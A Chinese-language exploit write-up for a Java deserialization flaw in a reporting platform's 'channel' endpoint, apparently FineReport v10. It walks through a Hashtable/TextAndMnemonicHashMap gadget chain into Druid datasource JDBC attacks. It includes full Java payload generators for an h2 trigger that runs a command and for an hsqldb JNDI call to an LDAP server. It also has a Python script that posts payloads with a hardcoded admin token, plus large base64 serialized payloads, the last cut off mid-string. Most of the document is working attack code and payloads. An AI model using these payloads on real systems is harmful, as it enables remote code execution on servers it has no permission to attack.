某v10 channel 反序列化 出网通杀

漏洞原理

分两块讲,第一个是反序列化点,第二个是绕黑名单的新链子。

Hashtable链

EXP

利用链如下:

1
2
3
4
5
Hashtable#readObject -> 
Hashtable#reconstitutionPut ->
abstractMap#equals ->
TextAndMnemonicHashMap#get ->
com.fr.json.JSONArray#toString -> com.fr.third.alibaba.druid.pool.xa.DruidXADataSource#getXConnection

函数调用栈

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
createPhysicalConnection:1826, DruidAbstractDataSource (com.alibaba.druid.pool)
init:936, DruidDataSource (com.alibaba.druid.pool)
getConnection:1473, DruidDataSource (com.alibaba.druid.pool)
getConnection:1469, DruidDataSource (com.alibaba.druid.pool)
getXAConnection:42, DruidXADataSource (com.alibaba.druid.pool.xa)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
serializeAsField:688, BeanPropertyWriter (com.fr.third.fasterxml.jackson.databind.ser)
serializeFields:772, BeanSerializerBase (com.fr.third.fasterxml.jackson.databind.ser.std)
serialize:178, BeanSerializer (com.fr.third.fasterxml.jackson.databind.ser)
serializeContents:119, IndexedListSerializer (com.fr.third.fasterxml.jackson.databind.ser.impl)
serialize:79, IndexedListSerializer (com.fr.third.fasterxml.jackson.databind.ser.impl)
serialize:18, IndexedListSerializer (com.fr.third.fasterxml.jackson.databind.ser.impl)
_serialize:479, DefaultSerializerProvider (com.fr.third.fasterxml.jackson.databind.ser)
serializeValue:318, DefaultSerializerProvider (com.fr.third.fasterxml.jackson.databind.ser)
_writeValueAndClose:4719, ObjectMapper (com.fr.third.fasterxml.jackson.databind)
writeValueAsString:3964, ObjectMapper (com.fr.third.fasterxml.jackson.databind)
encode:99, EmbedJson (com.fr.json.revise)
encode:560, JSONArray (com.fr.json)
toString:590, JSONArray (com.fr.json)
get:1251, UIDefaults$TextAndMnemonicHashMap (javax.swing)
equals:492, AbstractMap (java.util)
reconstitutionPut:1241, Hashtable (java.util)
readObject:1215, Hashtable (java.util)

EXP(h2 jdbc attack):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
package org.example;

import com.alibaba.druid.pool.DruidAbstractDataSource;
import com.alibaba.druid.pool.DruidDataSource;
import com.alibaba.druid.pool.xa.DruidXADataSource;
import com.fr.json.JSONArray;
import utils.ReflectUtils;
import utils.SerializeUtils;


import java.io.*;
import java.util.*;
import java.util.zip.GZIPOutputStream;


public class h2Attack {
public static void main(String[] args) throws Exception{
String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
"INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
"java.lang.Runtime.getRuntime().exec('open -a calculator')\n" +
"$$\n";

DruidXADataSource druidXADataSource = new DruidXADataSource();
druidXADataSource.setLogWriter(null);
druidXADataSource.setStatLogger(null);
druidXADataSource.setInitialSize(1);
druidXADataSource.setUrl(url);

// druidXADataSource.getXAConnection();

//通过jackson触发getter即getXAConnection(),JSONArray的toString会调用jackson原生反序列化
//即writeValueAsString,从而触发getter

ArrayList<Object> arrayList = new ArrayList<>();
arrayList.add(druidXADataSource);

JSONArray objects = new JSONArray(arrayList);
// objects.toString();

Map textAndMnemonicHashMap1 = (Map) ReflectUtils.getUnsafe().allocateInstance(Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap"));
Map textAndMnemonicHashMap2 = (Map) ReflectUtils.getUnsafe().allocateInstance(Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap"));

//触发UIDefaults$TextAndMnemonicHashMap#get方法
textAndMnemonicHashMap1.put(objects,"jasper");
textAndMnemonicHashMap2.put(objects,"n1ght");

ReflectUtils.setClassFieldValue(DruidAbstractDataSource.class,"transactionHistogram",druidXADataSource,null);
ReflectUtils.setClassFieldValue(DruidDataSource.class,"initedLatch",druidXADataSource,null);
ReflectUtils.setClassFieldValue(HashMap.class,"loadFactor",textAndMnemonicHashMap1,1);
ReflectUtils.setClassFieldValue(HashMap.class,"loadFactor",textAndMnemonicHashMap2,1);

Hashtable<Object, Object> hashtable = new Hashtable<>();
hashtable.put(textAndMnemonicHashMap1,1);
hashtable.put(textAndMnemonicHashMap2,1);

textAndMnemonicHashMap1.put(objects,null);
textAndMnemonicHashMap2.put(objects,null);


String payload = SerializeUtils.serializeBase64(hashtable);
// System.out.println(gzipWrapper(payload));
SerializeUtils.unserializeBase64(payload);
}

public static String gzipWrapper(String base64String) throws Exception{
byte[] bytes = Base64.getDecoder().decode(base64String);
// 使用Java反序列化漏洞利用工具生成一个包含恶意代码的序列化对象,并将其序列化成字节数组
byte[] maliciousBytes = bytes;
// 构造一个GZIP格式的字节数组,将恶意字节数组存储在GZIP数据块中
ByteArrayOutputStream baos = new ByteArrayOutputStream();
GZIPOutputStream gzipOutputStream = new GZIPOutputStream(baos);
gzipOutputStream.write(maliciousBytes);
gzipOutputStream.finish();
byte[] gzipBytes = baos.toByteArray();
String exp = Base64.getEncoder().encodeToString(gzipBytes);
return exp;
}
}

问题一:为什么要设置setter

setUrl最简单,因为要触发jdbc attack,而其他三个setter的作用则要分析一下

1
2
3
4
druidXADataSource.setLogWriter(null);
druidXADataSource.setStatLogger(null);
druidXADataSource.setInitialSize(1);
druidXADataSource.setUrl(url);

setLogWriter(null)、setStatLogger(null)是因为,在DruidXADataSource的对象被序列化的时候,会递归序列化其所有fields,而其中的logWriter和statLogger并未实现Serializable接口,于是在递归序列化的时候报错NoSerializable,设置成null就不会再判断是否可序列化,也就bypass了

断点打在ObjectOutputStream#1548,条件断点寻找所有未实现Serializable接口的Field:

1
objVals[i] != null && (obj.hashCode() == 509886383) && !(objVals[i] instanceof Serializable)

setInitialSize(1)的原因则和反序列化有关,首先测试可以发现,直接调getXConnection()是可以打通的,但是反序列化调用就打不通了,于是开始对比分析:

直接 getXConnection 触发jdbc attack的调用栈如下:

1
2
3
4
5
6
getConnectionInternal:1674, DruidDataSource (com.alibaba.druid.pool)
getConnectionDirect:1504, DruidDataSource (com.alibaba.druid.pool)
getConnection:1484, DruidDataSource (com.alibaba.druid.pool)
getConnection:1469, DruidDataSource (com.alibaba.druid.pool)
getXAConnection:42, DruidXADataSource (com.alibaba.druid.pool.xa)
main:34, h2Attack (org.example)

而反序列化去触发jdbc attack时,在DruidDataSource#init中,原本在构造函数里初始化了的this.initedLatch变成了null,这导致它在调用await函数时抛出异常

而如果this.init()过不去,自然就无法执行到this.getConnectionDirect(),也就导致反序列化无法和直接调用getXConnection一样触发jdbc attack,如下图所示

解决方案是druidXADataSource.setInitialSize(1),同样是在this.init()函数里,在调用this.initedLatch.await()之前存在下面的代码段,原本这个while循环因为条件不符直接跳过,但是如果设置了initialSize,则可以执行到this.createPhysicalConnection(),而这个函数同样可以打jdbc attack(这里比较奇特,不太清楚怎么发现的)

调用栈如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
createPhysicalConnection:1694, DruidAbstractDataSource (com.alibaba.druid.pool)
createPhysicalConnection:1794, DruidAbstractDataSource (com.alibaba.druid.pool)
init:936, DruidDataSource (com.alibaba.druid.pool)
getConnection:1473, DruidDataSource (com.alibaba.druid.pool)
getConnection:1469, DruidDataSource (com.alibaba.druid.pool)
getXAConnection:42, DruidXADataSource (com.alibaba.druid.pool.xa)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
serializeAsField:688, BeanPropertyWriter (com.fr.third.fasterxml.jackson.databind.ser)
serializeFields:772, BeanSerializerBase (com.fr.third.fasterxml.jackson.databind.ser.std)
serialize:178, BeanSerializer (com.fr.third.fasterxml.jackson.databind.ser)
serializeContents:119, IndexedListSerializer (com.fr.third.fasterxml.jackson.databind.ser.impl)
serialize:79, IndexedListSerializer (com.fr.third.fasterxml.jackson.databind.ser.impl)
serialize:18, IndexedListSerializer (com.fr.third.fasterxml.jackson.databind.ser.impl)
_serialize:479, DefaultSerializerProvider (com.fr.third.fasterxml.jackson.databind.ser)
serializeValue:318, DefaultSerializerProvider (com.fr.third.fasterxml.jackson.databind.ser)
_writeValueAndClose:4719, ObjectMapper (com.fr.third.fasterxml.jackson.databind)
writeValueAsString:3964, ObjectMapper (com.fr.third.fasterxml.jackson.databind)
encode:99, EmbedJson (com.fr.json.revise)
encode:560, JSONArray (com.fr.json)
toString:590, JSONArray (com.fr.json)
get:1251, UIDefaults$TextAndMnemonicHashMap (javax.swing)
equals:492, AbstractMap (java.util)
reconstitutionPut:1241, Hashtable (java.util)
readObject:1215, Hashtable (java.util)

问题二:为什么Map前后put两次

和CC7类似,textAndMnemonicHashMap在hashtableput的前后put了两次,并且value先异后同

1
2
3
4
5
6
7
8
textAndMnemonicHashMap1.put(objects,"jasper");  
textAndMnemonicHashMap2.put(objects,"n1ght");
...略
hashtable.put(textAndMnemonicHashMap1,1);
hashtable.put(textAndMnemonicHashMap2,1);
...略
textAndMnemonicHashMap1.put(objects,null);
textAndMnemonicHashMap2.put(objects,null);

这样构造本质还是因为hashtable.readObject触发的reconstitutionPut,简单说reconstitutionPut方法就是把一个个反序列化后的Map存入tab,而存入时自然会判断是否有冲突,于是使用hash和equals来做判断,我们利用的也是这个点。

目标是执行到AbstactMap#equals,但在此之前需要判断e.hash和key.hashCode()是否相等,只有相等才能走到equals

而key.hashCode()实际上就是 key.hash ^ value.hash,而e.hash则是上一个存入tab的textAndMnemonicHashMap1的key.hashCode(),那么想执行equals需要两个entry的key和value一致,这解释payload为什么设置两个null。

在设置两个null之前,value先设置成不同的值,则是为避免提前触发链子,因为hashtable在put时会触发同样的equals

问题三:为什么设置loadFactor

因为不加会报错,给出了错误提示0.0

这个调试一下就知道了,不加loadFactor没办法反序列化= =

HashMap链

漏洞利用

hsql

v10的最新版默认内置hsql和jdk8u191,所以考虑打hsql jdbc attack,通过调用Java静态函数lookup去打jndi,然后因为是高版本jdk所以再打ldap反序列化,这样反序列化就不受 blacklist.txt 限制,黑名单里随便找个链子反序列化即可。

坑点:

  1. 指定的hsql数据库的目录必须存在且有权限写文件,并且之前最好没写过数据
  2. 现成工具无法直接利用,因为官方包和fr开头的包不一样,这里魔改 JNDIMap,把fr包打进去实现利用
  3. 最新的v10不带BeanUtils了,这里我用的jackson

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
package org.example;

import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fr.json.JSONArray;
import utils.ReflectUtils;
import utils.SerializeUtils;

import java.io.*;
import java.util.*;
import java.util.zip.GZIPOutputStream;


public class HdqlAttack {
public static void main(String[] args) throws Exception{
String ldapPld = "ldap://127.0.0.1:1389/Deserialize/FineReportJackson/Command/open .";
String query = "call \"javax.naming.InitialContext.doLookup\"('"+ ldapPld + "');";
String url = "jdbc:hsqldb:file:/Users/jasper/Downloads/test/";
DruidXADataSource druidXADataSource = new DruidXADataSource();

druidXADataSource.setLogWriter(null);
druidXADataSource.setStatLogger(null);
druidXADataSource.setInitialSize(1);

druidXADataSource.setValidationQuery(query);
druidXADataSource.setUrl(url);
druidXADataSource.setDriverClassName("com.fr.third.org.hsqldb.jdbcDriver");

// druidXADataSource.getXAConnection();
// 通过jackson触发getter即getXAConnection(),JSONArray的toString会调用jackson原生反序列化
// 即writeValueAsString,从而触发getter

ArrayList<Object> arrayList = new ArrayList<>();
arrayList.add(druidXADataSource);

JSONArray objects = new JSONArray(arrayList);
// objects.toString();

Map textAndMnemonicHashMap1 = (Map) ReflectUtils.getUnsafe().allocateInstance(Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap"));
Map textAndMnemonicHashMap2 = (Map) ReflectUtils.getUnsafe().allocateInstance(Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap"));

//触发UIDefaults$TextAndMnemonicHashMap的get方法
textAndMnemonicHashMap1.put(objects,"yy");
textAndMnemonicHashMap2.put(objects,"zZ");

ReflectUtils.setClassFieldValue(DruidAbstractDataSource.class,"transactionHistogram",druidXADataSource,null);
ReflectUtils.setClassFieldValue(DruidDataSource.class,"initedLatch",druidXADataSource,null);
ReflectUtils.setClassFieldValue(HashMap.class,"loadFactor",textAndMnemonicHashMap1,1);
ReflectUtils.setClassFieldValue(HashMap.class,"loadFactor",textAndMnemonicHashMap2,1);

Hashtable<Object, Object> hashtable = new Hashtable<>();
hashtable.put(textAndMnemonicHashMap1,1);
hashtable.put(textAndMnemonicHashMap2,1);

textAndMnemonicHashMap2.put(objects,null);
textAndMnemonicHashMap1.put(objects,null);


String payload = SerializeUtils.serializeBase64(hashtable);
System.out.println(gzipWrapper(payload));
// SerializeUtils.unserializeBase64(payload);
}

public static String gzipWrapper(String base64String) throws Exception{
byte[] bytes = Base64.getDecoder().decode(base64String);
// 使用Java反序列化漏洞利用工具生成一个包含恶意代码的序列化对象,并将其序列化成字节数组
byte[] maliciousBytes = bytes;
// 构造一个GZIP格式的字节数组,将恶意字节数组存储在GZIP数据块中
ByteArrayOutputStream baos = new ByteArrayOutputStream();
GZIPOutputStream gzipOutputStream = new GZIPOutputStream(baos);
gzipOutputStream.write(maliciousBytes);
gzipOutputStream.finish();
byte[] gzipBytes = baos.toByteArray();
String exp = Base64.getEncoder().encodeToString(gzipBytes);
return exp;
}
}

h2

h2 jdbc attack直接rce,直接上exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
package org.example;

import com.alibaba.druid.pool.DruidAbstractDataSource;
import com.alibaba.druid.pool.DruidDataSource;
import com.alibaba.druid.pool.xa.DruidXADataSource;
import com.fr.json.JSONArray;
import utils.ReflectUtils;
import utils.SerializeUtils;


import java.io.*;
import java.util.*;
import java.util.zip.GZIPOutputStream;


public class h2Attack {
public static void main(String[] args) throws Exception{
String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
"INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
"java.lang.Runtime.getRuntime().exec('open -a calculator')\n" +
"$$\n";

DruidXADataSource druidXADataSource = new DruidXADataSource();
druidXADataSource.setLogWriter(null);
druidXADataSource.setStatLogger(null);
druidXADataSource.setInitialSize(1);
druidXADataSource.setUrl(url);
// druidXADataSource.getXAConnection();
//通过jackson触发getter即getXAConnection(),JSONArray的toString会调用jackson原生反序列化
//即writeValueAsString,从而触发getter

ArrayList<Object> arrayList = new ArrayList<>();
arrayList.add(druidXADataSource);

JSONArray objects = new JSONArray(arrayList);
// objects.toString();

Map textAndMnemonicHashMap1 = (Map) ReflectUtils.getUnsafe().allocateInstance(Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap"));
Map textAndMnemonicHashMap2 = (Map) ReflectUtils.getUnsafe().allocateInstance(Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap"));

//触发UIDefaults$TextAndMnemonicHashMap#get方法
textAndMnemonicHashMap1.put(objects,"jasper");
textAndMnemonicHashMap2.put(objects,"n1ght");

ReflectUtils.setClassFieldValue(DruidAbstractDataSource.class,"transactionHistogram",druidXADataSource,null);
ReflectUtils.setClassFieldValue(DruidDataSource.class,"initedLatch",druidXADataSource,null);
ReflectUtils.setClassFieldValue(HashMap.class,"loadFactor",textAndMnemonicHashMap1,1);
ReflectUtils.setClassFieldValue(HashMap.class,"loadFactor",textAndMnemonicHashMap2,1);

Hashtable<Object, Object> hashtable = new Hashtable<>();
hashtable.put(textAndMnemonicHashMap1,1);
hashtable.put(textAndMnemonicHashMap2,1);

textAndMnemonicHashMap1.put(objects,null);
textAndMnemonicHashMap2.put(objects,null);

String payload = SerializeUtils.serializeBase64(hashtable);
//// System.out.println(payload);
System.out.println(gzipWrapper(payload));
SerializeUtils.unserializeBase64(payload);
}

public static String gzipWrapper(String base64String) throws Exception{
byte[] bytes = Base64.getDecoder().decode(base64String);
// 使用Java反序列化漏洞利用工具生成一个包含恶意代码的序列化对象,并将其序列化成字节数组
byte[] maliciousBytes = bytes;
// 构造一个GZIP格式的字节数组,将恶意字节数组存储在GZIP数据块中
ByteArrayOutputStream baos = new ByteArrayOutputStream();
GZIPOutputStream gzipOutputStream = new GZIPOutputStream(baos);
gzipOutputStream.write(maliciousBytes);
gzipOutputStream.finish();
byte[] gzipBytes = baos.toByteArray();
String exp = Base64.getEncoder().encodeToString(gzipBytes);
return exp;
}
}

发送脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import base64
import requests
import urllib3

def cmd(host):
try:
url = host + "/webroot/decision/remote/design/channel"
headers = {
"Content-Type": "application/octet-stream",
"token": "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiIsInRlbmFudElkIjoiZGVmYXVsdCIsImlzcyI6ImZhbnJ1YW4iLCJkZXNjcmlwdGlvbiI6ImFkbWluKGFkbWluKSIsImV4cCI6MTcyMzEzNDgxNiwiaWF0IjoxNzIzMTMxMjE5LCJqdGkiOiJpYnFtcVNSek94RmYrQ3JnUzlXeG5NMDdqT3BYVWF4RHV0czMvNGpTKzBqdGlCSzcifQ.x0xKCO4bR6EVGqEoI7W4es7aRWPn5idSTeOYBleBumM",
"username": "admin"
}
## h2 jdbc attack rce

## b = b"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"
## hsqldb 打 jackson
b = b"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